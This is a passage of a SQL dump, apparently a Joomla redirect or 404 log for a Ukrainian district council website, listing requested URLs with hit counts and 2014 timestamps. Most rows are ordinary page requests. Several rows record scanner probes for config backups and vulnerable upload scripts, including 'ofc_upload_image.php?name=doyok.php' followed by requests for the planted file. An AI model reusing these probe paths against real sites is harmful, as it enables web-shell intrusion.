00:00:00',301),(11082,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-17 06:55:41','0000-00-00 00:00:00',301),(11083,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1057:--22072013--2100-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-17 08:53:55','0000-00-00 00:00:00',301),(11084,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=997:-27-&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-17 08:53:59','0000-00-00 00:00:00',301),(11085,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-11-17 08:54:43','0000-00-00 00:00:00',301),(11086,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=57:--15042014-&Itemid=98&lang=ru','','','',6,0,'2014-11-17 09:05:44','0000-00-00 00:00:00',301),(11087,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-11-17 11:12:26','0000-00-00 00:00:00',301),(11088,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-11-17 11:38:34','0000-00-00 00:00:00',301),(11089,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=968:-2012-&catid=11&lang=uk','','','',1,0,'2014-11-17 11:46:12','0000-00-00 00:00:00',301),(11090,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=0&lang=uk','','','',7,0,'2014-11-17 13:47:42','0000-00-00 00:00:00',301),(11091,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-11-17 13:54:31','0000-00-00 00:00:00',301),(11092,'http://www.malyn-rayrada.org.ua/stories/images/svin','','http://www.malyn-rayrada.org.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=920','',6,0,'2014-11-17 14:09:07','0000-00-00 00:00:00',301),(11093,'http://www.malyn-rayrada.org.ua/images/stories/svin','','http://www.malyn-rayrada.org.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=920','',2,0,'2014-11-17 14:09:39','0000-00-00 00:00:00',301),(11094,'http://www.malyn-rayrada.org.ua/stories/images/svinn','','http://www.malyn-rayrada.org.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=920','',2,0,'2014-11-17 14:13:18','0000-00-00 00:00:00',301),(11095,'http://www.malyn-rayrada.org.ua/images/stories/svinn','','http://www.malyn-rayrada.org.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=920','',2,0,'2014-11-17 14:13:48','0000-00-00 00:00:00',301),(11096,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1248:2014-03-21-18-16-44&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-17 15:13:14','0000-00-00 00:00:00',301),(11097,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=993:-21-&lang=uk&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11%3A2010-06-05-14-33-33&id=993%3A-21-&lang=uk&option=com_content&view=article','',3,0,'2014-11-17 15:57:08','0000-00-00 00:00:00',301),(11098,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1350:2014-06-23-07-06-24&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-17 16:48:12','0000-00-00 00:00:00',301),(11099,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-11-17 19:11:25','0000-00-00 00:00:00',301),(11100,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-17 23:39:55','0000-00-00 00:00:00',301),(11101,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=ru&Itemid=','','','',4,0,'2014-11-18 00:08:20','0000-00-00 00:00:00',301),(11102,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=0&lang=ru','','','',2,0,'2014-11-18 00:34:55','0000-00-00 00:00:00',301),(11103,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=0&lang=uk','','','',2,0,'2014-11-18 00:36:27','0000-00-00 00:00:00',301),(11104,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1170:2014-01-08-11-02-06&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-18 02:43:54','0000-00-00 00:00:00',301),(11105,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1152:2013-11-28-14-58-05&Itemid=95&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-18 02:45:02','0000-00-00 00:00:00',301),(11106,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-11-18 03:10:39','0000-00-00 00:00:00',301),(11107,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1377:-23-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-11-18 03:10:43','0000-00-00 00:00:00',301),(11108,'http://www.malyn-rayrada.org.ua/index.php?Itemid=96&catid=55:--26122013-&id=1169:2014-01-08-07-30-47&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-18 05:05:03','0000-00-00 00:00:00',301),(11109,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1126:2013-10-31-12-52-35&lang=uk&option=com_content&view=article','','','',6,0,'2014-11-18 05:05:26','0000-00-00 00:00:00',301),(11110,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1356:2014-07-03-06-32-02&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-18 05:05:28','0000-00-00 00:00:00',301),(11111,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1148:29-2013-25-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-18 05:05:30','0000-00-00 00:00:00',301),(11112,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-18 05:22:03','0000-00-00 00:00:00',301),(11113,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-18 05:38:11','0000-00-00 00:00:00',301),(11114,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-18 06:05:25','0000-00-00 00:00:00',301),(11115,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1053:2013-07-19-11-34-22&Itemid=92&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-18 06:08:05','0000-00-00 00:00:00',301),(11116,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1148:29-2013-25-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-18 06:39:36','0000-00-00 00:00:00',301),(11117,'http://malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1371:2014-08-04-19-11-42&tmpl=component&print=1&layout=default&page=&lang=uk','','','',2,0,'2014-11-18 07:25:32','0000-00-00 00:00:00',301),(11118,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1359:2014-07-07-08-13-48&lang=uk&option=com_content&view=article','','http://go.mail.ru/search?fm=1&rf=7993&q=%D0%9D%D0%BE%D0%B2%D0%B8%D0%BD%D0%B8+%D0%BF%D0%BE+%D1%96%D0%BD%D0%B4%D0%B5%D0%BA%D1%81%D0%B0%D1%86%D1%96%D1%97','',1,0,'2014-11-18 07:48:44','0000-00-00 00:00:00',301),(11119,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1078:-2007-2015-&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-18 07:52:51','0000-00-00 00:00:00',301),(11120,'http://malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1344:-25-2013-464-l-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-18 07:52:58','0000-00-00 00:00:00',301),(11121,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1029:2013-06-17-06-34-51&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-18 08:14:01','0000-00-00 00:00:00',301),(11122,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1172:2014-01-14-14-46-07&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-18 09:24:19','0000-00-00 00:00:00',301),(11123,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1044:2013-07-05-11-26-05&Itemid=92&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-18 09:26:10','0000-00-00 00:00:00',301),(11124,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1132:2013-11-13-10-02-24&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-18 09:27:35','0000-00-00 00:00:00',301),(11125,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1119:2013-10-25-12-26-37&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-18 09:27:38','0000-00-00 00:00:00',301),(11126,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1355:2014-07-02-06-11-04&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-18 09:28:13','0000-00-00 00:00:00',301),(11127,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1093:-2017-&Itemid=94&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-18 09:28:35','0000-00-00 00:00:00',301),(11128,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1044:2013-07-05-11-26-05&Itemid=92&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-18 09:28:59','0000-00-00 00:00:00',301),(11129,'http://www.malyn-rayrada.org.ua/index.php?catid=58:--30042014-&id=1304:2014-04-30-09-11-23&Itemid=105&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-18 09:32:37','0000-00-00 00:00:00',301),(11130,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1040:2013-07-01-14-27-50&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-18 09:48:04','0000-00-00 00:00:00',301),(11131,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1011:2013-05-29-09-51-28&lang=en&option=com_content&view=article','','','',7,0,'2014-11-18 09:48:06','0000-00-00 00:00:00',301),(11132,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1195:2014-01-28-13-01-27&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-18 09:48:08','0000-00-00 00:00:00',301),(11133,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=853:2012-12-11-13-39-46&catid=32&Itemid=64&lang=ru','','','',6,0,'2014-11-18 11:39:41','0000-00-00 00:00:00',301),(11134,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:----------------------2013-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-11-18 11:39:58','0000-00-00 00:00:00',301),(11135,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&Itemid=14&lang=en','','','',1,0,'2014-11-18 11:40:10','0000-00-00 00:00:00',301),(11136,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1260:2014-03-31-11-32-51&Itemid=17&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-18 11:57:11','0000-00-00 00:00:00',301),(11137,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-11-18 12:36:00','0000-00-00 00:00:00',301),(11138,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1092:2013-09-19-12-18-37&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-18 12:36:33','0000-00-00 00:00:00',301),(11139,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1037:-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-18 12:56:16','0000-00-00 00:00:00',301),(11140,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1021:-l-r&Itemid=92&lang=en&option=com_content&view=article','','','',1,0,'2014-11-18 13:37:51','0000-00-00 00:00:00',301),(11141,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-18 13:47:09','0000-00-00 00:00:00',301),(11142,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1103:2013-10-03-09-29-30&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-18 14:10:58','0000-00-00 00:00:00',301),(11143,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1315:-31-6-&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-18 14:30:23','0000-00-00 00:00:00',301),(11144,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1154:7-&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-18 14:30:37','0000-00-00 00:00:00',301),(11145,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-11-18 15:24:14','0000-00-00 00:00:00',301),(11146,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1018:2013-06-06-11-22-34&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-18 15:45:11','0000-00-00 00:00:00',301),(11147,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1262:2014-03-31-11-36-45&Itemid=17&lang=en&option=com_content&view=article','','','',2,0,'2014-11-18 17:55:04','0000-00-00 00:00:00',301),(11148,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/193-pro-upovnovazhennja-rajonnoi-derzhavnoi','',4,0,'2014-11-18 18:48:34','0000-00-00 00:00:00',301),(11149,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=959:2013-03-11-06-19-41&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-18 18:53:46','0000-00-00 00:00:00',301),(11150,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1101:2013-10-03-07-11-01&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-18 18:53:55','0000-00-00 00:00:00',301),(11151,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1055:2013-07-19-11-43-17&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-18 18:53:57','0000-00-00 00:00:00',301),(11152,'http://www.malyn-rayrada.org.ua/index.php?Itemid=1&id=1&lang=uk&option=com_phocagallery&view=category','','','',1,0,'2014-11-18 18:54:04','0000-00-00 00:00:00',301),(11153,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-18 19:10:09','0000-00-00 00:00:00',301),(11154,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-18 19:23:44','0000-00-00 00:00:00',301),(11155,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-18 19:42:53','0000-00-00 00:00:00',301),(11156,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=968:-2012-&lang=uk&option=com_content&view=article','','','',7,0,'2014-11-18 20:28:41','0000-00-00 00:00:00',301),(11157,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&id=10:2013-02-22-07-29-10&lang=ru&option=com_poll','','','',2,0,'2014-11-18 20:46:35','0000-00-00 00:00:00',301),(11158,'http://www.malyn-rayrada.org.ua/index.php?catid=58:--30042014-&id=1244:-2014-2018-&Itemid=105&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-18 21:00:56','0000-00-00 00:00:00',301),(11159,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1194:-2012-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-18 22:02:41','0000-00-00 00:00:00',301),(11160,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1070:2013-08-23-04-27-00&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-18 23:37:26','0000-00-00 00:00:00',301),(11161,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1088:2013-09-19-12-06-07&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-18 23:37:31','0000-00-00 00:00:00',301),(11162,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=976:2013-03-21-18-42-06&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-19 01:12:14','0000-00-00 00:00:00',301),(11163,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1183:2014-01-28-09-18-31&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-19 01:12:18','0000-00-00 00:00:00',301),(11164,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1096:2013-09-24-13-34-16&lang=ru&option=com_content&view=article','','','',6,0,'2014-11-19 02:46:14','0000-00-00 00:00:00',301),(11165,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1286:2014-04-23-06-48-27&lang=uk&option=com_content&view=article','','','',7,0,'2014-11-19 02:46:39','0000-00-00 00:00:00',301),(11166,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1132:2013-11-13-10-02-24&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-19 02:46:42','0000-00-00 00:00:00',301),(11167,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1118:2013-10-25-12-24-30&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-19 02:46:44','0000-00-00 00:00:00',301),(11168,'http://www.malyn-rayrada.org.ua/images/stories/sono.php','','','',5,0,'2014-11-19 02:47:26','0000-00-00 00:00:00',301),(11169,'http://www.malyn-rayrada.org.ua/config.old.php','','','',23,0,'2014-11-19 02:47:37','0000-00-00 00:00:00',301),(11170,'http://www.malyn-rayrada.org.ua/components/com_facileforms/libraries/jquery/uploadify.php','','','',31,0,'2014-11-19 02:47:41','0000-00-00 00:00:00',301),(11171,'http://www.malyn-rayrada.org.ua/config.old.php?jom','','','',31,0,'2014-11-19 02:47:48','0000-00-00 00:00:00',301),(11172,'http://www.malyn-rayrada.org.ua//administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 02:52:06','0000-00-00 00:00:00',301),(11173,'http://www.malyn-rayrada.org.ua//administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 02:52:16','0000-00-00 00:00:00',301),(11174,'http://www.malyn-rayrada.org.ua//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 02:52:46','0000-00-00 00:00:00',301),(11175,'http://www.malyn-rayrada.org.ua//administrator/components/com_acymailing/inc/openflash/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 02:52:55','0000-00-00 00:00:00',301),(11176,'http://www.malyn-rayrada.org.ua//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 02:53:29','0000-00-00 00:00:00',301),(11177,'http://www.malyn-rayrada.org.ua//administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 02:53:38','0000-00-00 00:00:00',301),(11178,'http://www.malyn-rayrada.org.ua//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 02:54:05','0000-00-00 00:00:00',301),(11179,'http://www.malyn-rayrada.org.ua//administrator/components/com_jinc/classes/graphics/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 02:54:14','0000-00-00 00:00:00',301),(11180,'http://www.malyn-rayrada.org.ua//administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 02:54:42','0000-00-00 00:00:00',301),(11181,'http://www.malyn-rayrada.org.ua//administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 02:54:53','0000-00-00 00:00:00',301),(11182,'http://www.malyn-rayrada.org.ua//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 02:55:21','0000-00-00 00:00:00',301),(11183,'http://www.malyn-rayrada.org.ua//administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 02:55:29','0000-00-00 00:00:00',301),(11184,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 02:55:31','0000-00-00 00:00:00',301),(11185,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 02:55:40','0000-00-00 00:00:00',301),(11186,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=959:2013-03-11-06-19-41&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-19 03:03:41','0000-00-00 00:00:00',301),(11187,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-11-19 03:12:06','0000-00-00 00:00:00',301),(11188,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1193:-2014-2015-&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-19 04:21:09','0000-00-00 00:00:00',301),(11189,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1026:2013-06-14-05-02-34&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-19 04:21:15','0000-00-00 00:00:00',301),(11190,'http://malyn-rayrada.org.ua/images/stories/sono.php','','','',4,0,'2014-11-19 04:48:30','0000-00-00 00:00:00',301),(11191,'http://malyn-rayrada.org.ua/config.old.php','','','',28,0,'2014-11-19 04:48:43','0000-00-00 00:00:00',301),(11192,'http://malyn-rayrada.org.ua/components/com_facileforms/libraries/jquery/uploadify.php','','','',36,0,'2014-11-19 04:48:47','0000-00-00 00:00:00',301),(11193,'http://malyn-rayrada.org.ua/config.old.php?jom','','','',35,0,'2014-11-19 04:48:54','0000-00-00 00:00:00',301),(11194,'http://malyn-rayrada.org.ua//administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 04:53:13','0000-00-00 00:00:00',301),(11195,'http://malyn-rayrada.org.ua//administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 04:53:22','0000-00-00 00:00:00',301),(11196,'http://malyn-rayrada.org.ua//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 04:53:51','0000-00-00 00:00:00',301),(11197,'http://malyn-rayrada.org.ua//administrator/components/com_acymailing/inc/openflash/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 04:54:00','0000-00-00 00:00:00',301),(11198,'http://malyn-rayrada.org.ua//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 04:54:28','0000-00-00 00:00:00',301),(11199,'http://malyn-rayrada.org.ua//administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 04:54:37','0000-00-00 00:00:00',301),(11200,'http://malyn-rayrada.org.ua//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 04:55:05','0000-00-00 00:00:00',301),(11201,'http://malyn-rayrada.org.ua//administrator/components/com_jinc/classes/graphics/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 04:55:14','0000-00-00 00:00:00',301),(11202,'http://malyn-rayrada.org.ua//administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 04:55:42','0000-00-00 00:00:00',301),(11203,'http://malyn-rayrada.org.ua//administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 04:55:51','0000-00-00 00:00:00',301),(11204,'http://malyn-rayrada.org.ua//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 04:56:19','0000-00-00 00:00:00',301),(11205,'http://malyn-rayrada.org.ua//administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 04:56:28','0000-00-00 00:00:00',301),(11206,'http://malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=doyok.php','','','',1,0,'2014-11-19 04:56:30','0000-00-00 00:00:00',301),(11207,'http://malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/tmp-upload-images/doyok.php','','','',1,0,'2014-11-19 04:56:39','0000-00-00 00:00:00',301),(11208,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-11-19 05:52:36','0000-00-00 00:00:00',301),(11209,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1011:2013-05-29-09-51-28&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-19 05:56:06','0000-00-00 00:00:00',301),(11210,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1150:2013-11-28-14-53-17&lang=uk&option=com_content&view=article','','http://go.mail.ru/search?fr=spc&nosp=1&q=%D0%9F%D0%A0%D0%9E%D0%9E%D0%9E%D0%9D%20%D0%9F%D0%A0%D0%9E%D0%95%D0%9A%D0%A2%D0%98%20%D0%9F%D0%9E%20%D0%9E%D0%','',1,0,'2014-11-19 06:34:52','0000-00-00 00:00:00',301),(11211,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1205:2014-01-31-07-53-03&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-19 08:29:06','0000-00-00 00:00:00',301),(11212,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1180:27-----4--2014-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-19 10:39:15','0000-00-00 00:00:00',301),(11213,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1088:2013-09-19-12-06-07&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-19 10:54:39','0000-00-00 00:00:00',301),(11214,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=972:2013-03-19-10-50-05&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-19 10:54:57','0000-00-00 00:00:00',301),(11215,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=962:-2017-&lang=en&option=com_content&view=article','','','',1,0,'2014-11-19 15:37:51','0000-00-00 00:00:00',301),(11216,'http://malyn-rayrada.org.ua/index.php?Itemid=7&id=3:2010-06-05-12-50-56&lang=en&layout=blog&option=com_content&view=category','','','',4,0,'2014-11-19 17:11:54','0000-00-00 00:00:00',301),(11217,'http://www.malyn-rayrada.org.ua/index.php/component/content/category/17-deputatska-storinka/2010-06-05-12-51-34','','','',14,0,'2014-11-19 18:29:20','0000-00-00 00:00:00',301),(11218,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1003:1&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-19 18:45:55','0000-00-00 00:00:00',301),(11219,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=943:-qq&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-19 20:07:00','0000-00-00 